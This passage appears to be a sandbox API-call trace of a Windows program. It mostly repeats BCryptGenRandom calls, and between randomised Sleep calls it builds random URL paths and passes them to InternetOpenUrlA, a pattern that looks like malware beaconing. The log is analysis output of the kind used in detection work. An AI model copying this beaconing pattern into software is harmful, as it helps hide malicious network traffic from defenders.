(hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.521] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.522] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.522] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0177.522] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.522] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.522] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.522] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0177.522] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.522] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.523] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.523] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0177.523] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.523] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.523] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.523] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0177.523] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.523] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.524] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.524] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0177.524] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.524] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0177.524] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.524] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a034e2, cbBuffer=0x25, dwFlags=0x2 | out: pbBuffer=0x3a034e2) returned 0x0 [0177.524] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.524] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.524] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.525] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0177.525] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.525] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.525] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.525] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.525] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.525] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.525] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.525] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.526] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.526] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0177.526] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.526] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.526] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.526] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.526] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.526] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.527] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.527] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.527] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.527] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.527] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.527] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0177.527] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.527] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0177.528] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.528] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.528] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.528] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0177.528] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.528] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.528] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.528] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0177.529] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.529] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0177.529] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.529] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.529] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.529] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0177.530] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.530] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.530] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.530] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.530] GetProcessHeap () returned 0x440000 [0177.530] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x473560 [0177.530] lstrcpyA (in: lpString1=0x473560, lpString2="\x81\x03" | out: lpString1="\x81\x03") returned="\x81\x03" [0177.530] lstrcatA (in: lpString1="\x81\x03", lpString2="/AC6Jkdcoyfqgtbx2m3ajbiNtgkBWcu4m87sDP5oa5Lpi8n8/9bcvyjgt7i1ayWe4pmh5jqli9dHdMurGa/4ysnkkrfp3k2u9hhucupvithe9tlQ8aoTtv5lsrs/6eu87dhk6smGp0mZ8ehVL/vnd8hWOzts6jjabhksg5Vu2r1SG3Bo2jhMal/" | out: lpString1="\x81\x03/AC6Jkdcoyfqgtbx2m3ajbiNtgkBWcu4m87sDP5oa5Lpi8n8/9bcvyjgt7i1ayWe4pmh5jqli9dHdMurGa/4ysnkkrfp3k2u9hhucupvithe9tlQ8aoTtv5lsrs/6eu87dhk6smGp0mZ8ehVL/vnd8hWOzts6jjabhksg5Vu2r1SG3Bo2jhMal/") returned="\x81\x03/AC6Jkdcoyfqgtbx2m3ajbiNtgkBWcu4m87sDP5oa5Lpi8n8/9bcvyjgt7i1ayWe4pmh5jqli9dHdMurGa/4ysnkkrfp3k2u9hhucupvithe9tlQ8aoTtv5lsrs/6eu87dhk6smGp0mZ8ehVL/vnd8hWOzts6jjabhksg5Vu2r1SG3Bo2jhMal/" [0177.530] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0177.530] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="\x81\x03/AC6Jkdcoyfqgtbx2m3ajbiNtgkBWcu4m87sDP5oa5Lpi8n8/9bcvyjgt7i1ayWe4pmh5jqli9dHdMurGa/4ysnkkrfp3k2u9hhucupvithe9tlQ8aoTtv5lsrs/6eu87dhk6smGp0mZ8ehVL/vnd8hWOzts6jjabhksg5Vu2r1SG3Bo2jhMal/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0177.530] GetProcessHeap () returned 0x440000 [0177.530] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x473560 | out: hHeap=0x440000) returned 1 [0177.531] GetProcessHeap () returned 0x440000 [0177.531] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x3a03450 | out: hHeap=0x440000) returned 1 [0177.531] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0177.531] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0177.531] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.531] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0177.531] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0177.532] Sleep (dwMilliseconds=0x182e8) [0177.698] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.698] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0177.699] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.699] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0177.699] GetProcessHeap () returned 0x440000 [0177.699] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x33) returned 0x4f5070 [0177.699] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.699] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0177.699] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.699] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4f5071, cbBuffer=0x23, dwFlags=0x2 | out: pbBuffer=0x4f5071) returned 0x0 [0177.699] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.700] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.700] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.700] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.700] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.700] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.700] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.700] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0177.700] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.701] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0177.701] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.701] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.701] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.701] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.701] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.701] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.701] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.701] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.702] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.702] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0177.702] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.702] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.702] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.702] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.702] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.702] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.703] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.703] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0177.703] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.703] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.703] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.703] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0177.703] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.703] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0177.703] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.704] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.704] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.704] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0177.704] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.704] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0177.704] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.704] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.704] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.705] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0177.705] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.705] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.705] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.706] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.707] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.707] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.707] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.707] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0177.707] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.707] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.707] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.707] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.708] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.708] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.708] GetProcessHeap () returned 0x440000 [0177.708] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x4741c0 [0177.708] lstrcpyA (in: lpString1=0x4741c0, lpString2="\x81\x03" | out: lpString1="\x81\x03") returned="\x81\x03" [0177.708] lstrcatA (in: lpString1="\x81\x03", lpString2="/wvn50tcqj9zgdGh46UmN91nMLpcw3Iv4cd/" | out: lpString1="\x81\x03/wvn50tcqj9zgdGh46UmN91nMLpcw3Iv4cd/") returned="\x81\x03/wvn50tcqj9zgdGh46UmN91nMLpcw3Iv4cd/" [0177.708] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0177.708] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="\x81\x03/wvn50tcqj9zgdGh46UmN91nMLpcw3Iv4cd/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0177.708] GetProcessHeap () returned 0x440000 [0177.708] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4741c0 | out: hHeap=0x440000) returned 1 [0177.708] GetProcessHeap () returned 0x440000 [0177.708] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4f5070 | out: hHeap=0x440000) returned 1 [0177.709] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0177.709] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0177.709] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.709] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0177.709] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0177.709] Sleep (dwMilliseconds=0x1a148) [0177.873] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.873] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0177.873] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.874] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0177.874] GetProcessHeap () returned 0x440000 [0177.874] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x64) returned 0x3a1b410 [0177.874] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.874] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0177.874] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.874] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a1b411, cbBuffer=0x19, dwFlags=0x2 | out: pbBuffer=0x3a1b411) returned 0x0 [0177.874] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.875] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0177.875] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.875] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.875] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.875] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.875] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.875] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.875] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.875] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0177.876] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.876] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 